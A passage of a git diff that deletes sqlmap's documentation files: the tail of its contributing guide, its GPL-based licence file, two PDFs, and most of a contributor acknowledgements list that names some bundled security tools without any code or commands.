*Why would this feature be useful?* -* If you are not sure whether something is a bug, or want to discuss a potential new feature before putting in an enhancement request, the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) is a good place to bring it up. - -## Submitting code changes - -All code contributions are greatly appreciated. First off, clone the [Git repository](https://github.com/sqlmapproject/sqlmap), read the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) carefully, go through the code yourself and [drop us an email](mailto:dev@sqlmap.org) if you are having a hard time grasping its structure and meaning. We apologize for not commenting the code enough - you could take a chance to read it through and [improve it](https://github.com/sqlmapproject/sqlmap/issues/37). - -Our preferred method of patch submission is via a Git [pull request](https://help.github.com/articles/using-pull-requests). -Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md) have contributed in different ways to the sqlmap development. **You** can be the next! - -### Guidelines - -In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions: - -* Each patch should make one logical change. -* Wrap code to 76 columns when possible. -* Avoid tabbing, use four blank spaces instead. -* Before you put time into a non-trivial patch, it is worth discussing it on the [mailing list](https://lists.sourceforge.net/lists/listinfo/sqlmap-users) or privately by [email](mailto:dev@sqlmap.org). -* Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected. 
-* Make changes on less than five files per single pull request - there is rarely a good reason to have more than five files changed on one pull request, as this dramatically increases the review time required to land (commit) any of those pull requests. -* Style that is too different from main branch will be ''adapted'' by the developers side. -* Do not touch anything inside `thirdparty/` and `extra/` folders. - -### Licensing - -By submitting code contributions to the sqlmap developers, to the mailing list, or via Git pull request, checking them into the sqlmap source code repository, it is understood (unless you specify otherwise) that you are offering the sqlmap copyright holders the unlimited, non-exclusive right to reuse, modify, and relicense the code. This is important because the inability to relicense code has caused devastating problems for other software projects (such as KDE and NASM). If you wish to specify special license conditions of your contributions, just say so when you send them. diff --git a/doc/COPYING b/doc/COPYING deleted file mode 100644 index 5fea2b3b..00000000 --- a/doc/COPYING +++ /dev/null @@ -1,372 +0,0 @@ -COPYING -- Describes the terms under which sqlmap is distributed. A copy -of the GNU General Public License (GPL) is appended to this file. - -sqlmap is (C) 2006-2016 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar. - -This program is free software; you may redistribute and/or modify it under -the terms of the GNU General Public License as published by the Free -Software Foundation; Version 2 (or later) with the clarifications and -exceptions described below. This guarantees your right to use, modify, and -redistribute this software under certain conditions. If you wish to embed -sqlmap technology into proprietary software, we sell alternative licenses -(contact sales@sqlmap.org). - -Note that the GPL places important restrictions on "derived works", yet it -does not provide a detailed definition of that term. 
To avoid -misunderstandings, we interpret that term as broadly as copyright law -allows. For example, we consider an application to constitute a "derived -work" for the purpose of this license if it does any of the following: -* Integrates source code from sqlmap. -* Reads or includes sqlmap copyrighted data files, such as xml/queries.xml -* Executes sqlmap and parses the results (as opposed to typical shell or - execution-menu apps, which simply display raw sqlmap output and so are - not derivative works). -* Integrates/includes/aggregates sqlmap into a proprietary executable - installer, such as those produced by InstallShield. -* Links to a library or executes a program that does any of the above - -The term "sqlmap" should be taken to also include any portions or derived -works of sqlmap. This list is not exclusive, but is meant to clarify our -interpretation of derived works with some common examples. Our -interpretation applies only to sqlmap - we do not speak for other people's -GPL works. - -If you have any questions about the GPL licensing restrictions on using -sqlmap in non-GPL works, we would be happy to help. As mentioned above, -we also offer alternative license to integrate sqlmap into proprietary -applications and appliances. - -If you received these files with a written license agreement or contract -stating terms other than the terms above, then that alternative license -agreement takes precedence over these comments. - -Source is provided to this software because we believe users have a right -to know exactly what a program is going to do before they run it. - -Source code also allows you to fix bugs and add new features. You are -highly encouraged to send your changes to dev@sqlmap.org for possible -incorporation into the main distribution. 
By sending these changes to the -sqlmap developers, to the mailing lists, or via Git pull request, checking -them into the sqlmap source code repository, it is understood (unless you -specify otherwise) that you are offering the sqlmap project the unlimited, -non-exclusive right to reuse, modify, and relicense the code. sqlmap will -always be available Open Source, but this is important because the -inability to relicense code has caused devastating problems for other Free -Software projects (such as KDE and NASM). If you wish to specify special -license conditions of your contributions, just say so when you send them. - -This program is distributed in the hope that it will be useful, but -WITHOUT ANY WARRANTY; without even the implied warranty of -MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -General Public License v2.0 for more details at -http://www.gnu.org/licenses/gpl-2.0.html, or below - -**************************************************************************** - - GNU GENERAL PUBLIC LICENSE - Version 2, June 1991 - - Copyright (C) 1989, 1991 Free Software Foundation, Inc., - 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - - Preamble - - The licenses for most software are designed to take away your -freedom to share and change it. By contrast, the GNU General Public -License is intended to guarantee your freedom to share and change free -software--to make sure the software is free for all its users. This -General Public License applies to most of the Free Software -Foundation's software and to any other program whose authors commit to -using it. (Some other Free Software Foundation software is covered by -the GNU Lesser General Public License instead.) You can apply it to -your programs, too. - - When we speak of free software, we are referring to freedom, not -price. 
Our General Public Licenses are designed to make sure that you -have the freedom to distribute copies of free software (and charge for -this service if you wish), that you receive source code or can get it -if you want it, that you can change the software or use pieces of it -in new free programs; and that you know you can do these things. - - To protect your rights, we need to make restrictions that forbid -anyone to deny you these rights or to ask you to surrender the rights. -These restrictions translate to certain responsibilities for you if you -distribute copies of the software, or if you modify it. - - For example, if you distribute copies of such a program, whether -gratis or for a fee, you must give the recipients all the rights that -you have. You must make sure that they, too, receive or can get the -source code. And you must show them these terms so they know their -rights. - - We protect your rights with two steps: (1) copyright the software, and -(2) offer you this license which gives you legal permission to copy, -distribute and/or modify the software. - - Also, for each author's protection and ours, we want to make certain -that everyone understands that there is no warranty for this free -software. If the software is modified by someone else and passed on, we -want its recipients to know that what they have is not the original, so -that any problems introduced by others will not reflect on the original -authors' reputations. - - Finally, any free program is threatened constantly by software -patents. We wish to avoid the danger that redistributors of a free -program will individually obtain patent licenses, in effect making the -program proprietary. To prevent this, we have made it clear that any -patent must be licensed for everyone's free use or not licensed at all. - - The precise terms and conditions for copying, distribution and -modification follow. 
- - GNU GENERAL PUBLIC LICENSE - TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION - - 0. This License applies to any program or other work which contains -a notice placed by the copyright holder saying it may be distributed -under the terms of this General Public License. The "Program", below, -refers to any such program or work, and a "work based on the Program" -means either the Program or any derivative work under copyright law: -that is to say, a work containing the Program or a portion of it, -either verbatim or with modifications and/or translated into another -language. (Hereinafter, translation is included without limitation in -the term "modification".) Each licensee is addressed as "you". - -Activities other than copying, distribution and modification are not -covered by this License; they are outside its scope. The act of -running the Program is not restricted, and the output from the Program -is covered only if its contents constitute a work based on the -Program (independent of having been made by running the Program). -Whether that is true depends on what the Program does. - - 1. You may copy and distribute verbatim copies of the Program's -source code as you receive it, in any medium, provided that you -conspicuously and appropriately publish on each copy an appropriate -copyright notice and disclaimer of warranty; keep intact all the -notices that refer to this License and to the absence of any warranty; -and give any other recipients of the Program a copy of this License -along with the Program. - -You may charge a fee for the physical act of transferring a copy, and -you may at your option offer warranty protection in exchange for a fee. - - 2. 
You may modify your copy or copies of the Program or any portion -of it, thus forming a work based on the Program, and copy and -distribute such modifications or work under the terms of Section 1 -above, provided that you also meet all of these conditions: - - a) You must cause the modified files to carry prominent notices - stating that you changed the files and the date of any change. - - b) You must cause any work that you distribute or publish, that in - whole or in part contains or is derived from the Program or any - part thereof, to be licensed as a whole at no charge to all third - parties under the terms of this License. - - c) If the modified program normally reads commands interactively - when run, you must cause it, when started running for such - interactive use in the most ordinary way, to print or display an - announcement including an appropriate copyright notice and a - notice that there is no warranty (or else, saying that you provide - a warranty) and that users may redistribute the program under - these conditions, and telling the user how to view a copy of this - License. (Exception: if the Program itself is interactive but - does not normally print such an announcement, your work based on - the Program is not required to print an announcement.) - -These requirements apply to the modified work as a whole. If -identifiable sections of that work are not derived from the Program, -and can be reasonably considered independent and separate works in -themselves, then this License, and its terms, do not apply to those -sections when you distribute them as separate works. But when you -distribute the same sections as part of a whole which is a work based -on the Program, the distribution of the whole must be on the terms of -this License, whose permissions for other licensees extend to the -entire whole, and thus to each and every part regardless of who wrote it. 
- -Thus, it is not the intent of this section to claim rights or contest -your rights to work written entirely by you; rather, the intent is to -exercise the right to control the distribution of derivative or -collective works based on the Program. - -In addition, mere aggregation of another work not based on the Program -with the Program (or with a work based on the Program) on a volume of -a storage or distribution medium does not bring the other work under -the scope of this License. - - 3. You may copy and distribute the Program (or a work based on it, -under Section 2) in object code or executable form under the terms of -Sections 1 and 2 above provided that you also do one of the following: - - a) Accompany it with the complete corresponding machine-readable - source code, which must be distributed under the terms of Sections - 1 and 2 above on a medium customarily used for software interchange; or, - - b) Accompany it with a written offer, valid for at least three - years, to give any third party, for a charge no more than your - cost of physically performing source distribution, a complete - machine-readable copy of the corresponding source code, to be - distributed under the terms of Sections 1 and 2 above on a medium - customarily used for software interchange; or, - - c) Accompany it with the information you received as to the offer - to distribute corresponding source code. (This alternative is - allowed only for noncommercial distribution and only if you - received the program in object code or executable form with such - an offer, in accord with Subsection b above.) - -The source code for a work means the preferred form of the work for -making modifications to it. For an executable work, complete source -code means all the source code for all modules it contains, plus any -associated interface definition files, plus the scripts used to -control compilation and installation of the executable. 
However, as a -special exception, the source code distributed need not include -anything that is normally distributed (in either source or binary -form) with the major components (compiler, kernel, and so on) of the -operating system on which the executable runs, unless that component -itself accompanies the executable. - -If distribution of executable or object code is made by offering -access to copy from a designated place, then offering equivalent -access to copy the source code from the same place counts as -distribution of the source code, even though third parties are not -compelled to copy the source along with the object code. - - 4. You may not copy, modify, sublicense, or distribute the Program -except as expressly provided under this License. Any attempt -otherwise to copy, modify, sublicense or distribute the Program is -void, and will automatically terminate your rights under this License. -However, parties who have received copies, or rights, from you under -this License will not have their licenses terminated so long as such -parties remain in full compliance. - - 5. You are not required to accept this License, since you have not -signed it. However, nothing else grants you permission to modify or -distribute the Program or its derivative works. These actions are -prohibited by law if you do not accept this License. Therefore, by -modifying or distributing the Program (or any work based on the -Program), you indicate your acceptance of this License to do so, and -all its terms and conditions for copying, distributing or modifying -the Program or works based on it. - - 6. Each time you redistribute the Program (or any work based on the -Program), the recipient automatically receives a license from the -original licensor to copy, distribute or modify the Program subject to -these terms and conditions. You may not impose any further -restrictions on the recipients' exercise of the rights granted herein. 
-You are not responsible for enforcing compliance by third parties to -this License. - - 7. If, as a consequence of a court judgment or allegation of patent -infringement or for any other reason (not limited to patent issues), -conditions are imposed on you (whether by court order, agreement or -otherwise) that contradict the conditions of this License, they do not -excuse you from the conditions of this License. If you cannot -distribute so as to satisfy simultaneously your obligations under this -License and any other pertinent obligations, then as a consequence you -may not distribute the Program at all. For example, if a patent -license would not permit royalty-free redistribution of the Program by -all those who receive copies directly or indirectly through you, then -the only way you could satisfy both it and this License would be to -refrain entirely from distribution of the Program. - -If any portion of this section is held invalid or unenforceable under -any particular circumstance, the balance of the section is intended to -apply and the section as a whole is intended to apply in other -circumstances. - -It is not the purpose of this section to induce you to infringe any -patents or other property right claims or to contest validity of any -such claims; this section has the sole purpose of protecting the -integrity of the free software distribution system, which is -implemented by public license practices. Many people have made -generous contributions to the wide range of software distributed -through that system in reliance on consistent application of that -system; it is up to the author/donor to decide if he or she is willing -to distribute software through any other system and a licensee cannot -impose that choice. - -This section is intended to make thoroughly clear what is believed to -be a consequence of the rest of this License. - - 8. 
If the distribution and/or use of the Program is restricted in -certain countries either by patents or by copyrighted interfaces, the -original copyright holder who places the Program under this License -may add an explicit geographical distribution limitation excluding -those countries, so that distribution is permitted only in or among -countries not thus excluded. In such case, this License incorporates -the limitation as if written in the body of this License. - - 9. The Free Software Foundation may publish revised and/or new versions -of the General Public License from time to time. Such new versions will -be similar in spirit to the present version, but may differ in detail to -address new problems or concerns. - -Each version is given a distinguishing version number. If the Program -specifies a version number of this License which applies to it and "any -later version", you have the option of following the terms and conditions -either of that version or of any later version published by the Free -Software Foundation. If the Program does not specify a version number of -this License, you may choose any version ever published by the Free Software -Foundation. - - 10. If you wish to incorporate parts of the Program into other free -programs whose distribution conditions are different, write to the author -to ask for permission. For software which is copyrighted by the Free -Software Foundation, write to the Free Software Foundation; we sometimes -make exceptions for this. Our decision will be guided by the two goals -of preserving the free status of all derivatives of our free software and -of promoting the sharing and reuse of software generally. - - NO WARRANTY - - 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY -FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. 
EXCEPT WHEN -OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES -PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED -OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF -MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS -TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE -PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING, -REPAIR OR CORRECTION. - - 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING -WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR -REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES, -INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING -OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED -TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY -YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER -PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE -POSSIBILITY OF SUCH DAMAGES. - - END OF TERMS AND CONDITIONS - -**************************************************************************** - -This license does not apply to the following components: - -* The Ansistrm library located under thirdparty/ansistrm/. -* The Beautiful Soup library located under thirdparty/beautifulsoup/. -* The Bottle library located under thirdparty/bottle/. -* The Chardet library located under thirdparty/chardet/. -* The ClientForm library located under thirdparty/clientform/. -* The Colorama library located under thirdparty/colorama/. -* The Fcrypt library located under thirdparty/fcrypt/. -* The Gprof2dot library located under thirdparty/gprof2dot/. -* The KeepAlive library located under thirdparty/keepalive/. -* The Magic library located under thirdparty/magic/. -* The MultipartPost library located under thirdparty/multipartpost/. -* The Odict library located under thirdparty/odict/. 
-* The Oset library located under thirdparty/oset/. -* The PageRank library located under thirdparty/pagerank/. -* The PrettyPrint library located under thirdparty/prettyprint/. -* The PyDes library located under thirdparty/pydes/. -* The SocksiPy library located under thirdparty/socks/. -* The Termcolor library located under thirdparty/termcolor/. -* The XDot library located under thirdparty/xdot/. -* The icmpsh tool located under extra/icmpsh/. - -Details for the above packages can be found in the THIRD-PARTY.md file. diff --git a/doc/FAQ.pdf b/doc/FAQ.pdf deleted file mode 100644 index 0a17b98f..00000000 Binary files a/doc/FAQ.pdf and /dev/null differ diff --git a/doc/README.pdf b/doc/README.pdf deleted file mode 100644 index fd5e4f72..00000000 Binary files a/doc/README.pdf and /dev/null differ diff --git a/doc/THANKS.md b/doc/THANKS.md deleted file mode 100644 index 70fc9741..00000000 --- a/doc/THANKS.md +++ /dev/null @@ -1,799 +0,0 @@ -# Individuals - -Andres Tarasco Acuna, -* for suggesting a feature - -Santiago Accurso, -* for reporting a bug - -Syed Afzal, -* for contributing a WAF script varnish.py - -Zaki Akhmad, -* for suggesting a couple of features - -Olu Akindeinde, -* for reporting a couple of bugs - -David Alvarez, -* for reporting a bug - -Sergio Alves, -* for reporting a bug - -Thomas Anderson, -* for reporting a bug - -Chip Andrews, -* for his excellent work maintaining the SQL Server versions database at SQLSecurity.com and permission to implement the update feature taking data from his site - -Smith Andy, -* for suggesting a feature - -Otavio Augusto, -* for reporting a minor bug - -Simon Baker, -* for reporting some bugs - -Ryan Barnett, -* for organizing the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html - -Emiliano Bazaes, -* for reporting a minor bug - -Daniele Bellucci, -* for starting sqlmap project and developing it between July and August 2006 - -Sebastian Bittig, and the rest of the team at r-tec IT 
Systeme GmbH -* for contributing the DB2 support initial patch: fingerprint and enumeration - -Anthony Boynes, -* for reporting several bugs - -Marcelo Toscani Brandao -* for reporting a bug - -Velky Brat, -* for suggesting a minor enhancement to the bisection algorithm - -James Briggs, -* for suggesting a minor enhancement - -Gianluca Brindisi, -* for reporting a couple of bugs - -Jack Butler, -* for contributing the sqlmap site favicon - -Ulisses Castro, -* for reporting a bug - -Roberto Castrogiovanni, -* for reporting a minor bug - -Cesar Cerrudo, -* for his Windows access token kidnapping tool Churrasco included in sqlmap tree as a contrib library and used to run the stand-alone payload stager on the target Windows machine as SYSTEM user if the user wants to perform a privilege escalation attack, http://www.argeniss.com/research/TokenKidnapping.pdf - -Karl Chen, -* for contributing the initial multi-threading patch for the inference algorithm - -Y P Chien, -* for reporting a minor bug - -Pierre Chifflier, and Mark Hymers, -* for uploading and accepting the sqlmap Debian package to the official Debian project repository - -Hysia Chow -* for contributing a couple of WAF scripts - -Chris Clements, -* for reporting a couple of bugs - -John Cobb, -* for reporting a minor bug - -Andreas Constantinides, -* for reporting a minor bug - -Andre Costa, -* for reporting a minor bug -* for suggesting a minor enhancement - -Ulises U. 
Cune, -* for reporting a bug - -Alessandro Curio, -* for reporting a minor bug - -Alessio Dalla Piazza, -* for reporting a couple of bugs - -Sherif El-Deeb, -* for reporting a minor bug - -Stefano Di Paola, -* for suggesting good features - -Mosk Dmitri, -* for reporting a minor bug - -Meng Dong, -* for contributing a code for Waffit integration - -Carey Evans, -* for his fcrypt module that allows crypt(3) support - on Windows platforms - -Shawn Evans, -* for suggesting an idea for one tamper script, greatest.py - -Adam Faheem, -* for reporting a few bugs - -James Fisher, -* for contributing two very good feature requests -* for his great tool too brute force directories and files names on web/application servers, DirBuster, http://tinyurl.com/dirbuster - -Jim Forster, -* for reporting a bug - -Rong-En Fan, -* for commiting the sqlmap 0.5 port to the official FreeBSD project repository - -Giorgio Fedon, -* for suggesting a speed improvement for bisection algorithm -* for reporting a bug when running against Microsoft SQL Server 2005 - -Kasper Fons, -* for reporting several bugs - -Jose Fonseca, -* for his Gprof2Dot utility for converting profiler output to dot graph(s) and for his XDot utility to render nicely dot graph(s), both included in sqlmap tree inside extra folder. These libraries are used for sqlmap development purposes only - http://code.google.com/p/jrfonseca/wiki/Gprof2Dot - http://code.google.com/p/jrfonseca/wiki/XDot - -Alan Franzoni, -* for helping out with Python subprocess library - -Harold Fry, -* for suggesting a minor enhancement - -Daniel G. 
Gamonal, -* for reporting a minor bug - -Marcos Mateos Garcia, -* for reporting a minor bug - -Andrew Gecse, -* for reporting a minor issue - -Ivan Giacomelli, -* for reporting a bug -* for suggesting a minor enhancement -* for reviewing the documentation - -Dimitris Giannitsaros, -* for contributing a REST-JSON API client - -Nico Golde, -* for reporting a couple of bugs - -Oliver Gruskovnjak, -* for reporting a bug -* for contributing a minor patch - -Davide Guerri, -* for suggesting an enhancement - -Dan Guido, -* for promoting sqlmap in the context of the Penetration Testing and Vulnerability Analysis class at the Polytechnic University of New York, http://isisblogs.poly.edu/courses/pentest/ - -David Guimaraes, -* for reporting considerable amount of bugs -* for suggesting several features - -Chris Hall, -* for coding the prettyprint.py library - -Tate Hansen, -* for donating to sqlmap development - -Mario Heiderich, -Christian Matthies, -Lars H. Strojny, -* for their great tool PHPIDS included in sqlmap tree as a set of rules for testing payloads against IDS detection, http://php-ids.org - -Kristian Erik Hermansen, -* for reporting a bug -* for donating to sqlmap development - -Alexander Hagenah, -* for reporting a minor bug - -Dennis Hecken, -* for reporting a minor bug - -Choi Ho, -* for reporting a minor bug - -Jorge Hoya, -* for suggesting a minor enhancement - -Will Holcomb, -* for his MultipartPostHandler class to handle multipart POST forms and permission to include it within sqlmap source code - -Daniel Huckmann, -* for reporting a couple of bugs - -Daliev Ilya, -* for reporting a bug - -Mehmet İnce, -* for contributing a tamper script xforwardedfor.py - -Jovon Itwaru, -* for reporting a minor bug - -Prashant Jadhav, -* for reporting a bug - -Dirk Jagdmann, -* for reporting a typo in the documentation - -Luke Jahnke, -* for reporting a bug when running against MySQL < 5.0 - -Andrew Kitis -* for contributing a tamper script lowercase.py - -David Klein, 
-* for reporting a minor code improvement - -Sven Klemm, -* for reporting two minor bugs with PostgreSQL - -Anant Kochhar, -* for providing with feedback on the user's manual - -Dmitriy Kononov, -* for reporting a minor bug - -Alexander Kornbrust, -* for reporting a couple of bugs - -Krzysztof Kotowicz, -* for reporting a minor bug - -Nicolas Krassas, -* for reporting a couple of bugs - -Oliver Kuckertz, -* for contributing a minor patch - -Alex Landa, -* for contributing a patch adding beta support for XML output - -Guido Landi, -* for reporting a couple of bugs -* for the great technical discussions -* for Microsoft SQL Server 2000 and Microsoft SQL Server 2005 'sp_replwritetovarbin' stored procedure heap-based buffer overflow (MS09-004) exploit development -* for presenting with Bernardo at SOURCE Conference 2009 in Barcelona (Spain) on September 21, 2009 and at CONfidence 2009 in Warsaw (Poland) on November 20, 2009 - -Lee Lawson, -* for reporting a minor bug - -John J. Lee, and others -* for developing the clientform Python library used by sqlmap to parse forms when --forms switch is specified - -Nico Leidecker, -* for providing with feedback on a few features -* for reporting a couple of bugs -* for his great tool icmpsh included in sqlmap tree to get a command prompt via an out-of-band tunnel over ICMP, http://leidecker.info/downloads/icmpsh.zip - -Gabriel Lima, -* for reporting a couple of bugs - -Svyatoslav Lisin, -* for suggesting a minor feature - -Miguel Lopes, -* for reporting a minor bug - -Truong Duc Luong, -* for reporting a minor bug - -Pavol Luptak, -* for reporting a bug when injecting on a POST data parameter - -Till Maas, -* for suggesting a minor feature - -Michael Majchrowicz, -* for extensively beta-testing sqlmap on various MySQL DBMS -* for providing really appreciated feedback -* for suggesting a lot of ideas and features - -Vinícius Henrique Marangoni, -* for contributing a Portuguese translation of README.md - -Ahmad Maulana, -* for 
contributing a tamper script halfversionedmorekeywords.py - -Ferruh Mavituna, -* for exchanging ideas on the implementation of a couple of features - -David McNab, -* for his XMLObject module that allows XML files to be operated on like Python objects - -Spencer J. McIntyre, -* for reporting a minor bug -* for contributing a patch for OS fingerprinting on DB2 - -Brad Merrell, -* for reporting a minor bug - -Michael Meyer, -* for suggesting a minor feature - -Enrico Milanese, -* for reporting a minor bug -* for sharing some ideas for the PHP backdoor - -Liran Mimoni, -* for reporting a minor bug - -Marco Mirandola, -* for reporting a minor bug - -Devon Mitchell, -* for reporting a minor bug - -Anton Mogilin, -* for reporting a few bugs - -Sergio Molina, -* for reporting a minor bug - -Anastasios Monachos, -* for providing some useful data -* for suggesting a feature -* for reporting a couple of bugs - -Kirill Morozov, -* for reporting a bug -* for suggesting a feature - -Alejo Murillo Moya, -* for reporting a minor bug -* for suggesting a few features - -Yonny Mutai, -* for reporting a minor bug - -Roberto Nemirovsky, -* for pointing out some enhancements - -Sebastian Nerz, -* for reporting a (potential) vulnerability in --eval - -Simone Onofri, -* for patching the PHP web backdoor to make it work properly also on Windows - -Michele Orru, -* for reporting a couple of bug -* for suggesting ideas on how to implement the RESTful API - -Shaohua Pan, -* for reporting several bugs -* for suggesting a few features - -Antonio Parata, -* for sharing some ideas for the PHP backdoor - -Adrian Pastor, -* for donating to sqlmap development - -Christopher Patten, -* for reporting a bug in the blind SQL injection bisection algorithm - -Zack Payton, -* for reporting a minor bug - -Jaime Penalba, -* for contributing a patch for INSERT/UPDATE generic boundaries - -Pedrito Perez, <0ark1ang3l(at)gmail.com> -* for reporting a couple of bugs - -Brandon Perry, -* for reporting a couple of 
bugs - -Travis Phillips, -* for suggesting a minor enhancement - -Mark Pilgrim, -* for porting chardet package (Universal Encoding Detector) to Python - -Steve Pinkham, -* for suggesting a feature -* for contributing a new SQL injection vector (MSSQL time-based blind) -* for donating to sqlmap development - -Adam Pridgen, -* for suggesting some features - -Luka Pusic, -* for reporting a couple of bugs - -Ole Rasmussen, -* for reporting a bug -* for suggesting a feature - -Alberto Revelli, -* for inspiring to write sqlmap user's manual in SGML -* for his great Microsoft SQL Server take over tool, sqlninja, http://sqlninja.sourceforge.net - -David Rhoades, -* for reporting a bug - -Andres Riancho, -* for beta-testing sqlmap -* for reporting a bug and suggesting some features -* for including sqlmap in his great web application audit and attack framework, w3af, http://w3af.sourceforge.net -* for suggesting a way for handling DNS caching - -Jamie Riden, -* for reporting a minor bug - -Alexander Rigbo, -* for contributing a minor patch - -Antonio Riva, -* for reporting a bug when running with python 2.5 - -Ethan Robish, -* for reporting a bug - -Levente Rog, -* for reporting a minor bug - -Andrea Rossi, -* for reporting a minor bug -* for suggesting a feature - -Frederic Roy, -* for reporting a couple of bugs - -Vladimir Rutsky, -* for suggesting a couple of minor enhancements - -Richard Safran, -* for donating the sqlmap.org domain - -Tomoyuki Sakurai, -* for submitting to the FreeBSD project the sqlmap 0.5 port - -Roberto Salgado, -* for contributing considerable amount of tamper scripts - -Pedro Jacques Santos Santiago, -* for reporting considerable amount of bugs - -Marek Sarvas, -* for reporting several bugs - -Philippe A. R. 
Schaeffer, -* for reporting a minor bug - -Mohd Zamiri Sanin, -* for reporting a minor bug - -Jorge Santos, -* for reporting a minor bug - -Sven Schluter, -* for contributing a patch -* for waiting a number of seconds between each HTTP request - -Ryan Sears, -* for suggesting a couple of enhancements -* for donating to sqlmap development - -Uemit Seren, -* for reporting a minor adjustment when running with python 2.6 - -Shane Sewell, -* for suggesting a feature - -Ahmed Shawky, -* for reporting a major bug with improper handling of parameter values -* for reporting a bug - -Brian Shura, -* for reporting a bug - -Sumit Siddharth, -* for sharing ideas on the implementation of a couple of features - -Andre Silva, -* for reporting a bug - -Benjamin Silva H. -* for reporting a bug - -Duarte Silva -* for reporting a couple of bugs - -M Simkin, -* for suggesting a feature - -Konrads Smelkovs, -* for reporting a few bugs in --sql-shell and --sql-query on Microsoft SQL Server - -Chris Spencer, -* for reviewing the user's manual grammar - -Michael D. 
Stenner, -* for his keepalive module that allows handling of persistent HTTP 1.1 keep-alive connections - -Marek Stiefenhofer, -* for reporting a few bugs - -Jason Swan, -* for reporting a bug when enumerating columns on Microsoft SQL Server -* for suggesting a couple of improvements - -Chilik Tamir, -* for contributing a patch for initial support SOAP requests - -Alessandro Tanasi, -* for extensively beta-testing sqlmap -* for suggesting many features and reporting some bugs -* for reviewing the documentation - -Andres Tarasco, -* for contributing good feedback - -Tom Thumb, -* for reporting a major bug - -Kazim Bugra Tombul, -* for reporting a minor bug - -Efrain Torres, -* for helping out to improve the Metasploit Framework sqlmap auxiliary module and for commiting it on the Metasploit official subversion repository -* for his great Metasploit WMAP Framework - -Sandro Tosi, -* for helping to create sqlmap Debian package correctly - -Jacco van Tuijl, -* for reporting several bugs - -Vitaly Turenko, -* for reporting a bug - -Augusto Urbieta, -* for reporting a minor bug - -Bedirhan Urgun, -* for reporting a few bugs -* for suggesting some features and improvements -* for benchmarking sqlmap in the context of his SQL injection benchmark project, OWASP SQLiBench, http://code.google.com/p/sqlibench - -Kyprianos Vasilopoulos, -* for reporting a couple of minor bugs - -Vlado Velichkovski, -* for reporting considerable amount of bugs -* for suggesting an enhancement - -Johnny Venter, -* for reporting a couple of bugs - -Carlos Gabriel Vergara, -* for suggesting couple of good features - -Patrick Webster, -* for suggesting an enhancement - -Ed Williams, -* for suggesting a minor enhancement - -Anthony Zboralski, -* for providing with detailed feedback -* for reporting a few minor bugs -* for donating to sqlmap development - -Thierry Zoller, -* for reporting a couple of major bugs - -Zhen Zhou, -* for suggesting a feature - --insane-, -* for reporting a minor bug - -1ndr4 
joe, -* for reporting a couple of bugs - -abc abc, -* for reporting a minor bug - -Abuse 007, -* for reporting a bug - -agix, -* for contributing the file upload via certutil.exe functionality - -Alex, -* for reporting a minor bug - -anonymous anonymous, -* for reporting a couple of bugs - -bamboo, -* for reporting a couple of bugs - -Brandon E., -* for reporting a bug - -black zero, -* for reporting a minor bug - -blueBoy, -* for reporting a bug - -buawig, -* for reporting considerable amount of bugs - -Bugtrace, -* for reporting several bugs - -cats, -* for reporting a couple of bugs - -Christian S, -* for reporting a minor bug - -clav, -* for reporting a minor bug - -dragoun dash, -* for reporting a minor bug - -flsf, -* for contributing WAF scripts 360.py, anquanbao.py, baidu.py, safedog.py -* for contributing a minor patch - -fufuh, -* for reporting a bug when running on Windows - -Hans Wurst, -* for reporting a couple of bugs - -Hysia, -* for contributing a Chinese translation of README.md - -james, -* for reporting a bug - -Joe "Pragmatk", -* for reporting a few bugs - -John Smith, -* for reporting several bugs -* for suggesting some features - -m4l1c3, -* for reporting considerable amount of bugs - -mariano, -* for reporting a bug - -mitchell, -* for reporting a few bugs - -Nadzree, -* for reporting a minor bug - -nightman, -* for reporting considerable amount of bugs - -Oso Dog osodog123(at)yahoo.com -* for reporting a minor bug - -pacman730, -* for reporting a bug - -pentestmonkey, -* for reporting several bugs -* for suggesting a few minor enhancements - -Phat R., -* for reporting a few bugs - -Phil P, <(at)superevr> -* for suggesting a minor enhancement - -ragos, -* for reporting a minor bug - -rmillet, -* for reporting a bug - -Rub3nCT, -* for reporting a minor bug - -shiftzwei, -* for reporting a couple of bugs - -smith, -* for reporting a minor bug - -Soma Cruz, -* for reporting a minor bug - -Spiros94, -* for contributing a Greek translation of 
